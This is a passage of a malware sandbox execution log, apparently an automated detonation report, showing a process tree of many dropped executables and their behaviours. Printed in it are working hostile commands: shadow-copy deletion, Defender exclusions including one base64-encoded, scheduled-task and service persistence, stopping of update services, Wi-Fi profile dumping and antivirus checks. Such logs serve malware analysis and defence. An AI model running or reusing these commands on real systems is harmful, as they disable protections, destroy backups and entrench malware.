C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1664
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main5⤵PID:576
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main6⤵
- Blocklisted process makes network request
PID:4528 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\410826464235_Desktop.zip' -CompressionLevel Optimal7⤵
- Command and Scripting Interpreter: PowerShell
PID:1072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000910101\update.exe"C:\Users\Admin\AppData\Local\Temp\10000910101\update.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1900 -
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"6⤵PID:4696
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"6⤵
- Adds Run key to start application
PID:2664
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"6⤵
- Adds Run key to start application
PID:1048
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3768
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main5⤵
- Blocklisted process makes network request
PID:4732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- Executes dropped EXE
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\985220867.exeC:\Users\Admin\AppData\Local\Temp\985220867.exe4⤵
- Executes dropped EXE
PID:4748
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:652 -
C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe"C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe" /update "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2504 -
C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe" /delete "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Krishna33.exe"C:\Users\Admin\AppData\Local\Temp\Files\Krishna33.exe"3⤵
- Executes dropped EXE
PID:3100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr '"C:\Users\Admin\AppData\Roaming\chrome.exe"' & exit4⤵PID:3632
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr '"C:\Users\Admin\AppData\Roaming\chrome.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CCB.tmp.bat""4⤵PID:1064
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3084
-
-
C:\Users\Admin\AppData\Roaming\chrome.exe"C:\Users\Admin\AppData\Roaming\chrome.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"3⤵
- Executes dropped EXE
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"4⤵
- Executes dropped EXE
PID:3500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:2468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\client1.exe"C:\Users\Admin\AppData\Local\Temp\Files\client1.exe"3⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\Files\client1.exe"C:\Users\Admin\AppData\Local\Temp\Files\client1.exe"4⤵
- Executes dropped EXE
PID:4412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl ifconfig.co"5⤵PID:1068
-
C:\Windows\system32\curl.execurl ifconfig.co6⤵PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:3928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe"C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe"3⤵
- Executes dropped EXE
PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\Files\testingfile.exe"C:\Users\Admin\AppData\Local\Temp\Files\testingfile.exe"3⤵
- Executes dropped EXE
PID:3680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Modifies system certificate store
PID:2696
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"3⤵
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4984 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:4896
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:5344
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:10824
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:5544
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:14532
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2804
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:11496
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:14372
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\563115859.exeC:\Users\Admin\AppData\Local\Temp\563115859.exe4⤵
- System Location Discovery: System Language Discovery
PID:784
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"3⤵PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OLDxTEAM.exe"C:\Users\Admin\AppData\Local\Temp\Files\OLDxTEAM.exe"3⤵PID:840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 7684⤵
- Program crash
PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"3⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\2983116002.exeC:\Users\Admin\AppData\Local\Temp\2983116002.exe4⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t8wl838w.exe"C:\Users\Admin\AppData\Local\Temp\Files\t8wl838w.exe"3⤵PID:12344
-
-
C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe"C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe"3⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:9072
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xyaw4fkp.exe"C:\Users\Admin\AppData\Local\Temp\Files\xyaw4fkp.exe"3⤵
- Suspicious use of SetThreadContext
PID:6212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:9632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:11664
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:6752
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:9900
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe"C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:8624
-
-
C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe"C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:12108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat4⤵
- System Location Discovery: System Language Discovery
PID:14752 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:13612
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:13700
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:8700
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:14852
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6467515⤵PID:14524
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "AffiliateRobotsJoinedNewsletter" Purse5⤵PID:13052
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c5⤵PID:10424
-
-
C:\Users\Admin\AppData\Local\Temp\646751\Plates.pifPlates.pif c5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3064
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:5820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:14544
-
-
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"3⤵
- System Location Discovery: System Language Discovery
PID:15092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:9948
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"3⤵PID:7640
-
-
C:\Users\Admin\AppData\Local\Temp\Files\o.exe"C:\Users\Admin\AppData\Local\Temp\Files\o.exe"3⤵PID:15532
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fras.exe"C:\Users\Admin\AppData\Local\Temp\Files\fras.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:7964
-
-
C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"3⤵PID:11220
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test.exe"C:\Users\Admin\AppData\Local\Temp\Files\test.exe"3⤵PID:13156
-
C:\Windows\Temp\{6A2EE06E-CA1F-43EE-B695-32B0A88E9D2A}\.cr\test.exe"C:\Windows\Temp\{6A2EE06E-CA1F-43EE-B695-32B0A88E9D2A}\.cr\test.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\Files\test.exe" -burn.filehandle.attached=724 -burn.filehandle.self=7284⤵PID:12004
-
C:\Windows\Temp\{6C7C58BB-6251-4221-BA1E-417E04A26EC8}\.ba\DZIPR.exe"C:\Windows\Temp\{6C7C58BB-6251-4221-BA1E-417E04A26EC8}\.ba\DZIPR.exe"5⤵PID:8932
-
C:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exeC:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exe6⤵PID:6108
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵PID:13056
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵PID:11060
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit9⤵PID:15340
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe"C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe"3⤵PID:5276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe' -Force4⤵PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\self-injection.exe"C:\Users\Admin\AppData\Local\Temp\Files\self-injection.exe"3⤵PID:8496
-
-
C:\Users\Admin\AppData\Local\Temp\Files\system404.exe"C:\Users\Admin\AppData\Local\Temp\Files\system404.exe"3⤵PID:7764
-
-
C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"3⤵PID:11852
-
-
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"3⤵PID:1224
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"4⤵PID:13972
-
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"5⤵PID:16360
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:14196
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵PID:15648
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵PID:14808
-
C:\WINDOWS\SYSTEM32\cmd.execmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"8⤵PID:3816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"9⤵
- Command and Scripting Interpreter: PowerShell
PID:9864
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵PID:15248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
PID:9036
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc create x609915 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x609915\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x609915.dat" /f && sc start x6099158⤵PID:5964
-
C:\Windows\System32\sc.exesc create x609915 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
PID:11224
-
-
C:\Windows\System32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x609915\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x609915.dat" /f9⤵
- Modifies registry key
PID:6016
-
-
C:\Windows\System32\sc.exesc start x6099159⤵
- Launches sc.exe
PID:4500
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵PID:15992
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵PID:12612
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\bav64.exe"8⤵PID:10884
-
C:\Windows\System32\bav64.exe"C:\Windows\System32\bav64.exe"9⤵PID:10748
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"8⤵PID:8584
-
C:\Windows\System32\timeout.exetimeout /t 14 /nobreak9⤵
- Delays execution with timeout.exe
PID:16340
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"8⤵PID:14556
-
C:\Windows\System32\timeout.exetimeout /t 16 /nobreak9⤵
- Delays execution with timeout.exe
PID:10528
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"6⤵PID:7292
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
PID:232
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"4⤵PID:1156
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:16268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵PID:15040
-
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe4⤵PID:7092
-
C:\Users\Admin\AppData\Local\Temp\118814328.exeC:\Users\Admin\AppData\Local\Temp\118814328.exe5⤵PID:13088
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:15448
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:13140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:14872
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:7852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1514625554.exeC:\Users\Admin\AppData\Local\Temp\1514625554.exe5⤵PID:10368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"3⤵PID:7832
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:11728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:14444
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6864
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:6344
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:10764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:11328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:6448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:9248
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:15108
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:14984
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:14816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:7692
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:14576
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵PID:11788
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4584
-
-
C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"4⤵PID:1456
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:8468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe"C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe"3⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\is-7KL6P.tmp\Firefox.tmp"C:\Users\Admin\AppData\Local\Temp\is-7KL6P.tmp\Firefox.tmp" /SL5="$5023C,10261844,812544,C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe"4⤵PID:14700
-
C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe"C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe" /VERYSILENT /NORESTART5⤵PID:8092
-
C:\Users\Admin\AppData\Local\Temp\is-5702O.tmp\Firefox.tmp"C:\Users\Admin\AppData\Local\Temp\is-5702O.tmp\Firefox.tmp" /SL5="$B016A,10261844,812544,C:\Users\Admin\AppData\Local\Temp\Files\Firefox.exe" /VERYSILENT /NORESTART6⤵PID:5164
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"7⤵PID:12972
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:4476
-
-
C:\Windows\system32\find.exefind /I "wrsa.exe"8⤵PID:15112
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"7⤵PID:12188
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:9424
-
-
C:\Windows\system32\find.exefind /I "opssvc.exe"8⤵PID:13684
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"7⤵PID:14908
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:15808
-
-
C:\Windows\system32\find.exefind /I "avastui.exe"8⤵PID:8856
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"7⤵PID:7752
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:13788
-
-
C:\Windows\system32\find.exefind /I "avgui.exe"8⤵PID:14012
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"7⤵PID:8460
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:12708
-
-
C:\Windows\system32\find.exefind /I "nswscsvc.exe"8⤵PID:15960
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"7⤵PID:10280
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH8⤵
- Enumerates processes with tasklist
PID:4052
-
-
C:\Windows\system32\find.exefind /I "sophoshealth.exe"8⤵PID:9804
-
-
-
C:\Users\Admin\AppData\Local\hyponymous\AutoIt3.exe"C:\Users\Admin\AppData\Local\hyponymous\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\hyponymous\\overjob.a3x"7⤵PID:8744
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe"C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe"3⤵PID:4520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe"C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe"3⤵PID:10316
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"4⤵PID:13664
-
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"5⤵PID:11236
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c rmdir /s /q "C:\Windows \"6⤵PID:8272
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:16208
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"6⤵PID:5760
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
